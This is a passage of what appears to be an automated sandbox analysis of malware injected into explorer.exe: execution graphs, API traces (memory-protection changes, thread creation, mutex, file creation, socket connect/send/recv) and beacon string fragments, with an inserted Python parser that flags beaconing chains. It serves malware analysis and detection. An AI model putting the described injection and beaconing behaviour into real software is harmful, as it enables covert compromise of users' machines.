8ca3705 send 13551->13553 13552->13553 13553->13527 13555 8ca625c 13554->13555 13557 8ca6334 13554->13557 13556 8ca6410 NtCreateFile 13555->13556 13555->13557 13556->13557 13557->13533 13559 8c9c420 13558->13559 13560 8c9c0aa 13558->13560 13559->13508 13560->13559 13561 8ca6232 NtCreateFile 13560->13561 13563 8c9c1f9 13561->13563 13562 8c9c3df 13562->13508 13563->13562 13564 8ca6232 NtCreateFile 13563->13564 13565 8c9c3c9 13564->13565 13566 8ca6232 NtCreateFile 13565->13566 13566->13562 13568 8c9bf70 13567->13568 13569 8c9bf84 13567->13569 13568->13505 13570 8ca6232 NtCreateFile 13569->13570 13571 8c9c046 13570->13571 13571->13505 13573 8c9b031 13572->13573 13574 8c9b0cd 13573->13574 13575 8ca6f82 6 API calls 13573->13575 13574->13515 13575->13574 13756 8c9eedd 13758 8c9ef06 13756->13758 13757 8c9efa4 13758->13757 13759 8c9b8f2 NtProtectVirtualMemory 13758->13759 13760 8c9ef9c 13759->13760 13761 8ca2382 2 API calls 13760->13761 13761->13757 13871 8ca8a1f 13872 8ca8a25 13871->13872 13875 8c9c5f2 13872->13875 13874 8ca8a3d 13876 8c9c5fb 13875->13876 13877 8c9c60e 13875->13877 13876->13877 13878 8ca1662 6 API calls 13876->13878 13877->13874 13878->13877 13733 8ca7e12 13734 8ca7e45 NtProtectVirtualMemory 13733->13734 13735 8ca6942 13733->13735 13736 8ca7e70 13734->13736 13735->13734 13879 8c9c613 13880 8c9c620 13879->13880 13881 8c9c684 13880->13881 13882 8ca7e12 NtProtectVirtualMemory 13880->13882 13882->13880 13762 8ca0cd4 13764 8ca0cd8 13762->13764 13763 8ca1022 13764->13763 13768 8ca0352 13764->13768 13766 8ca0f0d 13766->13763 13777 8ca0792 13766->13777 13770 8ca039e 13768->13770 13769 8ca058e 13769->13766 13770->13769 13771 8ca04ec 13770->13771 13773 8ca0595 13770->13773 13772 8ca6232 NtCreateFile 13771->13772 13775 8ca04ff 13772->13775 13773->13769 13774 8ca6232 NtCreateFile 13773->13774 13774->13769 13775->13769 13776 8ca6232 NtCreateFile 13775->13776 13776->13769 13778 8ca07e0 13777->13778 13779 8ca6232 NtCreateFile 13778->13779 13781 8ca090c 13779->13781 13780 
8ca0af3 13780->13766 13781->13780 13782 8ca0352 NtCreateFile 13781->13782 13783 8ca0602 NtCreateFile 13781->13783 13782->13781 13783->13781 13883 8ca222a 13884 8ca225e 13883->13884 13885 8ca18c2 ObtainUserAgentString 13884->13885 13886 8ca226b 13885->13886 13832 8ca8aa9 13833 8ca8aaf 13832->13833 13836 8ca3212 13833->13836 13835 8ca8ac7 13837 8ca321b 13836->13837 13838 8ca3237 13836->13838 13837->13838 13839 8ca30c2 6 API calls 13837->13839 13838->13835 13839->13838 13989 8ca372e 13990 8ca376a 13989->13990 13991 8ca3788 connect 13989->13991 13990->13991 13576 8ca7bac 13577 8ca7bb1 13576->13577 13610 8ca7bb6 13577->13610 13611 8c9db72 13577->13611 13579 8ca7c2c 13580 8ca7c85 13579->13580 13582 8ca7c69 13579->13582 13583 8ca7c54 13579->13583 13579->13610 13581 8ca5ab2 NtProtectVirtualMemory 13580->13581 13586 8ca7c8d 13581->13586 13584 8ca7c6e 13582->13584 13585 8ca7c80 13582->13585 13587 8ca5ab2 NtProtectVirtualMemory 13583->13587 13589 8ca5ab2 NtProtectVirtualMemory 13584->13589 13585->13580 13590 8ca7c97 13585->13590 13647 8c9f102 13586->13647 13588 8ca7c5c 13587->13588 13633 8c9eee2 13588->13633 13595 8ca7c76 13589->13595 13592 8ca7cbe 13590->13592 13593 8ca7c9c 13590->13593 13597 8ca7cd9 13592->13597 13598 8ca7cc7 13592->13598 13592->13610 13615 8ca5ab2 13593->13615 13639 8c9efc2 13595->13639 13601 8ca5ab2 NtProtectVirtualMemory 13597->13601 13597->13610 13600 8ca5ab2 NtProtectVirtualMemory 13598->13600 13603 8ca7ccf 13600->13603 13604 8ca7ce5 13601->13604 13657 8c9f2f2 13603->13657 13675 8c9f712 13604->13675 13613 8c9db93 13611->13613 13612 8c9dcce 13612->13579 13613->13612 13614 8c9dcb5 CreateMutexW 13613->13614 13614->13612 13617 8ca5adf 13615->13617 13616 8ca5ebc 13625 8c9ede2 13616->13625 13617->13616 13687 8c9b8f2 13617->13687 13619 8ca5e5c 13620 8c9b8f2 NtProtectVirtualMemory 13619->13620 13621 8ca5e7c 13620->13621 13622 8c9b8f2 NtProtectVirtualMemory 13621->13622 13623 8ca5e9c 13622->13623 13624 8c9b8f2 NtProtectVirtualMemory 13623->13624 13624->13616 
13626 8c9edf0 13625->13626 13628 8c9eecd 13626->13628 13712 8ca2382 13626->13712 13629 8c9b412 13628->13629 13631 8c9b440 13629->13631 13630 8c9b473 13630->13610 13631->13630 13632 8c9b44d CreateThread 13631->13632 13632->13610 13635 8c9ef06 13633->13635 13634 8c9efa4 13634->13610 13635->13634 13636 8c9b8f2 NtProtectVirtualMemory 13635->13636 13637 8c9ef9c 13636->13637 13638 8ca2382 2 API calls 13637->13638 13638->13634 13641 8c9f016 13639->13641 13640 8c9f0f0 13640->13610 13641->13640 13644 8c9b8f2 NtProtectVirtualMemory 13641->13644 13645 8c9f0bb 13641->13645 13642 8c9f0e8 13643 8ca2382 2 API calls 13642->13643 13643->13640 13644->13645 13645->13642 13646 8c9b8f2 NtProtectVirtualMemory 13645->13646 13646->13642 13649 8c9f137 13647->13649 13648 8c9f2d5 13648->13610 13649->13648 13650 8c9b8f2 NtProtectVirtualMemory 13649->13650 13651 8c9f28a 13650->13651 13652 8c9b8f2 NtProtectVirtualMemory 13651->13652 13655 8c9f2a9 13652->13655 13653 8c9f2cd 13654 8ca2382 2 API calls 13653->13654 13654->13648 13655->13653 13656 8c9b8f2 NtProtectVirtualMemory 13655->13656 13656->13653 13659 8c9f349 13657->13659 13658 8c9f49f 13660 8c9b8f2 NtProtectVirtualMemory 13658->13660 13664 8c9f4c3 13658->13664 13659->13658 13661 8c9b8f2 NtProtectVirtualMemory 13659->13661 13660->13664 13662 8c9f480 13661->13662 13663 8c9b8f2 NtProtectVirtualMemory 13662->13663 13663->13658 13665 8c9b8f2 NtProtectVirtualMemory 13664->13665 13666 8c9f597 13664->13666 13665->13666 13667 8c9b8f2 NtProtectVirtualMemory 13666->13667 13669 8c9f5bf 13666->13669 13667->13669 13668 8c9f6e1 13670 8ca2382 2 API calls 13668->13670 13671 8c9b8f2 NtProtectVirtualMemory 13669->13671 13672 8c9f6b9 13669->13672 13673 8c9f6e9 13670->13673 13671->13672 13672->13668 13674 8c9b8f2 NtProtectVirtualMemory 13672->13674 13673->13610 13674->13668 13676 8c9f767 13675->13676 13677 8c9b8f2 NtProtectVirtualMemory 13676->13677 13681 8c9f903 13676->13681 13678 8c9f8e3 13677->13678 13679 8c9b8f2 NtProtectVirtualMemory 13678->13679 
13679->13681 13680 8c9f9b7 13682 8ca2382 2 API calls 13680->13682 13683 8c9b8f2 NtProtectVirtualMemory 13681->13683 13684 8c9f992 13681->13684 13685 8c9f9bf 13682->13685 13683->13684 13684->13680 13686 8c9b8f2 NtProtectVirtualMemory 13684->13686 13685->13610 13686->13680 13688 8c9b987 13687->13688 13689 8c9b9b2 13688->13689 13702 8c9c622 13688->13702 13691 8c9bc0c 13689->13691 13692 8c9bba2 13689->13692 13694 8c9bac5 13689->13694 13691->13619 13693 8ca7e12 NtProtectVirtualMemory 13692->13693 13701 8c9bb5b 13693->13701 13706 8ca7e12 13694->13706 13696 8ca7e12 NtProtectVirtualMemory 13696->13691 13697 8c9bae3 13697->13691 13698 8c9bb3d 13697->13698 13699 8ca7e12 NtProtectVirtualMemory 13697->13699 13700 8ca7e12 NtProtectVirtualMemory 13698->13700 13699->13698 13700->13701 13701->13691 13701->13696 13703 8c9c67a 13702->13703 13704 8c9c684 13703->13704 13705 8ca7e12 NtProtectVirtualMemory 13703->13705 13704->13689 13705->13703 13707 8ca7e45 NtProtectVirtualMemory 13706->13707 13710 8ca6942 13706->13710 13709 8ca7e70 13707->13709 13709->13697 13711 8ca6967 13710->13711 13711->13707 13713 8ca23c7 13712->13713 13718 8ca2232 13713->13718 13715 8ca2438 13722 8ca3632 13715->13722 13717 8ca2e7b 13717->13628 13719 8ca225e 13718->13719 13725 8ca18c2 13719->13725 13721 8ca226b 13721->13715 13723 8ca368b WSAStartup 13722->13723 13724 8ca366d 13722->13724 13723->13717 13724->13723 13727 8ca1934 13725->13727 13726 8ca19a6 13726->13721 13727->13726 13728 8ca1995 ObtainUserAgentString 13727->13728 13728->13726 13887 8ca362c 13888 8ca368b WSAStartup 13887->13888 13889 8ca366d 13887->13889 13889->13888 13890 8c9c42e 13891 8c9c45b 13890->13891 13898 8c9c4c9 13890->13898 13892 8ca6232 NtCreateFile 13891->13892 13891->13898 13893 8c9c496 13892->13893 13894 8c9c4c5 13893->13894 13896 8c9c082 NtCreateFile 13893->13896 13895 8ca6232 NtCreateFile 13894->13895 13894->13898 13895->13898 13897 8c9c4b6 13896->13897 13897->13894 13899 8c9bf52 NtCreateFile 13897->13899 13899->13894 13784 8ca0ce2 
13786 8ca0dd9 13784->13786 13785 8ca1022 13786->13785 13787 8ca0352 NtCreateFile 13786->13787 13788 8ca0f0d 13787->13788 13788->13785 13789 8ca0792 NtCreateFile 13788->13789 13789->13788 13790 8ca32e4 13791 8ca336f 13790->13791 13792 8ca3305 13790->13792 13792->13791 13794 8ca30c2 13792->13794 13795 8ca30cb 13794->13795 13797 8ca31f0 13794->13797 13796 8ca6f82 6 API calls 13795->13796 13795->13797 13796->13797 13797->13791 13967 8c9db66 13969 8c9db6a 13967->13969 13968 8c9dcce 13969->13968 13970 8c9dcb5 CreateMutexW 13969->13970 13970->13968 13900 8ca583a 13901 8ca5841 13900->13901 13902 8ca6f82 6 API calls 13901->13902 13903 8ca58c5 13902->13903 13904 8ca5906 13903->13904 13905 8ca6232 NtCreateFile 13903->13905 13905->13904 13971 8ca6f7a 13972 8ca6fb8 13971->13972 13973 8ca35b2 socket 13972->13973 13974 8ca7081 13972->13974 13982 8ca7022 13972->13982 13973->13974 13975 8ca7134 13974->13975 13977 8ca7117 getaddrinfo 13974->13977 13974->13982 13976 8ca3732 connect 13975->13976 13978 8ca71b2 13975->13978 13975->13982 13976->13978 13977->13975 13979 8ca36b2 send 13978->13979 13978->13982 13981 8ca7729 13979->13981 13980 8ca77f4 setsockopt recv 13980->13982 13981->13980 13981->13982 13798 8c9f0fb 13800 8c9f137 13798->13800 13799 8c9f2d5 13800->13799 13801 8c9b8f2 NtProtectVirtualMemory 13800->13801 13802 8c9f28a 13801->13802 13803 8c9b8f2 NtProtectVirtualMemory 13802->13803 13806 8c9f2a9 13803->13806 13804 8c9f2cd 13805 8ca2382 2 API calls 13804->13805 13805->13799 13806->13804 13807 8c9b8f2 NtProtectVirtualMemory 13806->13807 13807->13804 13840 8ca30b9 13841 8ca30ed 13840->13841 13843 8ca31f0 13840->13843 13842 8ca6f82 6 API calls 13841->13842 13841->13843 13842->13843 13844 8ca18be 13846 8ca18c3 13844->13846 13845 8ca19a6 13846->13845 13847 8ca1995 ObtainUserAgentString 13846->13847 13847->13845 13983 8ca237e 13984 8ca23c7 13983->13984 13985 8ca2232 ObtainUserAgentString 13984->13985 13986 8ca2438 13985->13986 13987 8ca3632 WSAStartup 13986->13987 13988 8ca2e7b 
13987->13988 13926 8c9efbf 13927 8c9f016 13926->13927 13929 8c9f0bb 13927->13929 13931 8c9b8f2 NtProtectVirtualMemory 13927->13931 13932 8c9f0f0 13927->13932 13928 8c9f0e8 13930 8ca2382 2 API calls 13928->13930 13929->13928 13933 8c9b8f2 NtProtectVirtualMemory 13929->13933 13930->13932 13931->13929 13933->13928 13737 8ca6232 13738 8ca625c 13737->13738 13740 8ca6334 13737->13740 13739 8ca6410 NtCreateFile 13738->13739 13738->13740 13739->13740 13808 8c9b0f1 13809 8c9b109 13808->13809 13810 8c9b1d3 13808->13810 13811 8c9b012 6 API calls 13809->13811 13812 8c9b113 13811->13812 13812->13810 13813 8ca6f82 6 API calls 13812->13813 13813->13810 13910 8c9c5f1 13911 8c9c60e 13910->13911 13912 8c9c606 13910->13912 13913 8ca1662 6 API calls 13912->13913 13913->13911 13934 8ca89b3 13935 8ca89bd 13934->13935 13938 8c9d6d2 13935->13938 13937 8ca89e0 13939 8c9d6f7 13938->13939 13941 8c9d704 13938->13941 13940 8c9b0f2 6 API calls 13939->13940 13942 8c9d6ff 13940->13942 13941->13942 13943 8c9d72d 13941->13943 13945 8c9d737 13941->13945 13942->13937 13947 8ca32c2 13943->13947 13945->13942 13946 8ca6f82 6 API calls 13945->13946 13946->13942 13948 8ca32df 13947->13948 13949 8ca32cb 13947->13949 13948->13942 13949->13948 13950 8ca30c2 6 API calls 13949->13950 13950->13948 13914 8ca89f1 13915 8ca89f7 13914->13915 13918 8c9d852 13915->13918 13917 8ca8a0f 13919 8c9d865 13918->13919 13920 8c9d8e4 13918->13920 13919->13920 13922 8c9d87e 13919->13922 13923 8c9d887 13919->13923 13920->13917 13921 8ca336f 13921->13917 13922->13921 13925 8ca30c2 6 API calls 13922->13925 13923->13920 13924 8ca1662 6 API calls 13923->13924 13924->13920 13925->13921 13814 8c9f2f4 13815 8c9f349 13814->13815 13816 8c9f49f 13815->13816 13818 8c9b8f2 NtProtectVirtualMemory 13815->13818 13817 8c9b8f2 NtProtectVirtualMemory 13816->13817 13821 8c9f4c3 13816->13821 13817->13821 13819 8c9f480 13818->13819 13820 8c9b8f2 NtProtectVirtualMemory 13819->13820 13820->13816 13822 8c9b8f2 NtProtectVirtualMemory 13821->13822 13823 
8c9f597 13821->13823 13822->13823 13824 8c9b8f2 NtProtectVirtualMemory 13823->13824 13827 8c9f5bf 13823->13827 13824->13827 13825 8c9f6b9 13826 8c9f6e1 13825->13826 13831 8c9b8f2 NtProtectVirtualMemory 13825->13831 13828 8ca2382 2 API calls 13826->13828 13827->13825 13829 8c9b8f2 NtProtectVirtualMemory 13827->13829 13830 8c9f6e9 13828->13830 13829->13825 13831->13826
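
The execution_graph above is a flat token stream: node definitions ("<id> <hexaddr>", optionally followed by an API name or an "N API calls" fold marker) mixed with "<id>-><id>" edges. The following parser, an added example that is not Joe Sandbox code and not part of the original report, turns that stream into a graph and reports which APIs each root function reaches. The grammar is inferred from the dump on this page and is an assumption; the function and helper names are mine. The sample input is an excerpt of the graph shown above (the NtProtectVirtualMemory helper at 8ca7e0a, the file routine at 8ca014a and the network routine at 8ca6f82).

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Grammar inferred from the execution_graph dump above (an assumption, not a
# documented Joe Sandbox format): a node is "<id> <hexaddr> [annotation ...]",
# an edge is "<id>-><id>", and an annotation is either an API name or
# "<N> API calls" for a callee whose own API calls were folded into one node.
EDGE = re.compile(r"^(\d+)->(\d+)$")
NODE_ID = re.compile(r"^\d+$")
HEX_ADDR = re.compile(r"^[0-9a-f]{6,16}$")

@dataclass
class Node:
    node_id: int
    addr: int
    apis: List[str] = field(default_factory=list)
    folded_calls: Optional[int] = None  # N from an "N API calls" annotation

def parse_execution_graph(text: str) -> Tuple[Dict[int, Node], List[Tuple[int, int]]]:
    tokens = text.split()
    nodes: Dict[int, Node] = {}
    edges: List[Tuple[int, int]] = []
    current: Optional[Node] = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        edge = EDGE.match(tok)
        if edge:
            edges.append((int(edge.group(1)), int(edge.group(2))))
            i += 1
        elif NODE_ID.match(tok) and i + 1 < len(tokens) and HEX_ADDR.match(tokens[i + 1]):
            current = Node(int(tok), int(tokens[i + 1], 16))
            nodes[current.node_id] = current
            i += 2
        elif current is None:
            raise ValueError(f"annotation {tok!r} appears before any node")
        elif NODE_ID.match(tok) and tokens[i + 1:i + 3] in (["API", "calls"], ["API", "call"]):
            current.folded_calls = int(tok)  # callee summarised as "N API calls"
            i += 3
        else:
            current.apis.append(tok)  # a Win32/Nt API name recorded at this node
            i += 1
    return nodes, edges

def roots(nodes: Dict[int, Node], edges: List[Tuple[int, int]]) -> List[int]:
    """Nodes with no incoming edge: the functions the sandbox treated as entry points."""
    targets = {dst for _, dst in edges}
    return [n for n in nodes if n not in targets]

def reachable_nodes(edges: List[Tuple[int, int]], root: int) -> List[int]:
    """Depth-first walk following edges in the order the dump lists them."""
    adj: Dict[int, List[int]] = {}
    for src, dst in edges:
        adj.setdefault(src, []).append(dst)
    seen, order, stack = set(), [], [root]
    while stack:
        n = stack.pop()
        if n in seen:
            continue
        seen.add(n)
        order.append(n)
        stack.extend(reversed(adj.get(n, [])))
    return order

def reachable_apis(nodes: Dict[int, Node], edges: List[Tuple[int, int]], root: int) -> List[str]:
    """Distinct API names reachable from root, in discovery order."""
    apis: List[str] = []
    for n in reachable_nodes(edges, root):
        for api in (nodes[n].apis if n in nodes else []):  # edges may leave the excerpt
            if api not in apis:
                apis.append(api)
    return apis

def folded_api_calls(nodes: Dict[int, Node], edges: List[Tuple[int, int]], root: int) -> int:
    """Sum of the "N API calls" counts hidden behind folded callees below root."""
    return sum(nodes[n].folded_calls or 0 for n in reachable_nodes(edges, root) if n in nodes)

def behaviour_summary(text: str) -> Dict[str, List[str]]:
    """Map each root function address (hex) to the APIs it reaches."""
    nodes, edges = parse_execution_graph(text)
    return {f"{nodes[r].addr:x}": reachable_apis(nodes, edges, r) for r in roots(nodes, edges)}

BEACON_APIS = {"socket", "connect", "send", "recv"}

def looks_like_c2_beacon(apis: List[str]) -> bool:
    """True when a routine both opens a socket and talks on it (connect/send/recv)."""
    return BEACON_APIS <= set(apis)

# Excerpt of this report's execution_graph (copied from the dump above).
SAMPLE_GRAPH = """
13867 8ca7e0a 13868 8ca6942 13867->13868 13869 8ca7e45 NtProtectVirtualMemory
13868->13869 13870 8ca7e70 13869->13870
13951 8ca014a 13952 8ca0153 13951->13952 13957 8ca0174 13951->13957 13953 8ca2382
2 API calls 13952->13953 13955 8ca016c 13953->13955 13954 8ca01e7 13956 8c9b0f2
6 API calls 13955->13956 13956->13957 13957->13954 13959 8c9b1f2 13957->13959
13960 8c9b20f 13959->13960 13961 8c9b2c9 13959->13961 13962 8ca5f12 7 API calls
13960->13962 13964 8c9b242 13960->13964 13961->13957 13962->13964 13963 8c9b289
13963->13961 13966 8c9b0f2 6 API calls 13963->13966 13964->13963 13965 8c9c432
NtCreateFile 13964->13965 13965->13963 13966->13961
13744 8ca6f82 13745 8ca6fb8 13744->13745 13746 8ca35b2 socket 13745->13746
13747 8ca7081 13745->13747 13755 8ca7022 13745->13755 13746->13747 13748 8ca7134
13747->13748 13750 8ca7117 getaddrinfo 13747->13750 13747->13755 13749 8ca3732
connect 13748->13749 13753 8ca71b2 13748->13753 13748->13755 13749->13753
13750->13748 13751 8ca36b2 send 13754 8ca7729 13751->13754 13752 8ca77f4
setsockopt recv 13752->13755 13753->13751 13753->13755 13754->13752 13754->13755
"""

if __name__ == "__main__":
    for addr, apis in behaviour_summary(SAMPLE_GRAPH).items():
        tag = "  <- socket/connect/send/recv chain" if looks_like_c2_beacon(apis) else ""
        print(f"{addr}: {apis}{tag}")
```

Two caveats when reading the output. Edge order in the dump is listing order, not execution order, so the API list is a reachability set and not a call sequence; and a node annotated "N API calls" hides its callee's APIs entirely, so the `folded_api_calls` total is the only trace of them in the excerpt. Rerunning over the whole execution_graph rather than the excerpt gives the per-root picture for every entry the sandbox observed.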

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: getaddrinforecvsetsockopt
                                          • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                          • API String ID: 1564272048-1117930895
                                          • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction ID: aceebc41ed07f9bb0574feed34d99d7ff2033cb13cd5003b8fa7eff3fb2cea24
                                          • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                          • Instruction Fuzzy Hash: 75528F34618A098FCB29EF68C4947EAB7F1FB54309F50462ED49FD7246DE30A54ACB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID: `
                                          • API String ID: 823142352-2679148245
                                          • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction ID: 58a4e29e861f1cce4895014b53d88014c55cc4a17d895eb5a17ec55a647b59fb
                                          • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                          • Instruction Fuzzy Hash: 06224D74A18A0A9FCB59DF28C499AAEF7F1FB68305F44422ED45ED3250DB30E552CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 457 8ca7e12-8ca7e38 458 8ca7e45-8ca7e6e NtProtectVirtualMemory 457->458 459 8ca7e40 call 8ca6942 457->459 460 8ca7e7d-8ca7e8f 458->460 461 8ca7e70-8ca7e7c 458->461 459->458
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 08CA7E67
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction ID: 9c16aad5ec736e7f0a605752aee98fb0107b238c7e627e12bc4606d00dad6afb
                                          • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                          • Instruction Fuzzy Hash: 86019E34668B484F8B88EF6C948412AB7E4FBD9219F000B3EA99AC3250EB64C5414742
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 462 8ca7e0a-8ca7e6e call 8ca6942 NtProtectVirtualMemory 465 8ca7e7d-8ca7e8f 462->465 466 8ca7e70-8ca7e7c 462->466
                                          APIs
                                          • NtProtectVirtualMemory.NTDLL ref: 08CA7E67
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: MemoryProtectVirtual
                                          • String ID:
                                          • API String ID: 2706961497-0
                                          • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction ID: 23d0edbf62c481d3298c2e13cab20f611fa66e60c23f2406ecfc802bba06d6ec
                                          • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                          • Instruction Fuzzy Hash: 9101A234628B884F8B88EB3C94452A6B3E5FBCE315F000B3EE9DAC3240DB25D5024782
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 08CA19A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: ecc4a02385bfb1a5a935c1d94966ff41deec0622716f8f24c572f4e339b5a27b
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: 3531AE31A14A0D8FCB45EFA8D8847EEB7F1FB58219F44422AD45EE7340DE788645C789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          • ObtainUserAgentString.URLMON ref: 08CA19A0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: AgentObtainStringUser
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 2681117516-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 5db92931d96628eb5a5b7fa99a9b35b99011691d3080bbef35f35a905f264be5
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 4B219170A14A4D8FCB45EFA8C8847EDBBB1FF5820AF44422AD45AE7340DF748645C789
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 232 8c9db66-8c9db68 233 8c9db6a-8c9db6b 232->233 234 8c9db93-8c9dbb8 232->234 235 8c9db6d-8c9db71 233->235 236 8c9dbbe-8c9dc22 call 8ca4612 call 8ca6942 * 2 233->236 237 8c9dbbb-8c9dbbc 234->237 235->237 238 8c9db73-8c9db92 235->238 246 8c9dc28-8c9dc2b 236->246 247 8c9dcdc 236->247 237->236 238->234 246->247 248 8c9dc31-8c9dcd3 call 8ca8da4 call 8ca8022 call 8ca83e2 call 8ca8022 call 8ca83e2 CreateMutexW 246->248 249 8c9dcde-8c9dcf6 247->249 248->247 263 8c9dcd5-8c9dcda 248->263 263->249
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction ID: 1e2c7c22e084470d10ea5140d86869bbf14d4a5cc943f3ca54730c832fa9611c
                                          • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                          • Instruction Fuzzy Hash: A2418D74918A088FCF84EFA8C8D8BAD77F0FB58301F04427AD94AEB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateMutex
                                          • String ID: .dll$el32$kern
                                          • API String ID: 1964310414-1222553051
                                          • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction ID: 679fbb3ba863db5c6666f8d6c3476fa385aa5555a82d8f1b79cbbdf145bbb001
                                          • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                          • Instruction Fuzzy Hash: D9414C74918A088FDB84EFA8C898BAD77F0FB68305F04417AD94EDB255DE309945CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 293 8ca372e-8ca3768 294 8ca376a-8ca3782 call 8ca6942 293->294 295 8ca3788-8ca37ab connect 293->295 294->295
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                          • Instruction ID: e9784f0f4b6441bbcb3974d8ee546d29c7b06af2a76378155df9a19610fc8a03
                                          • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
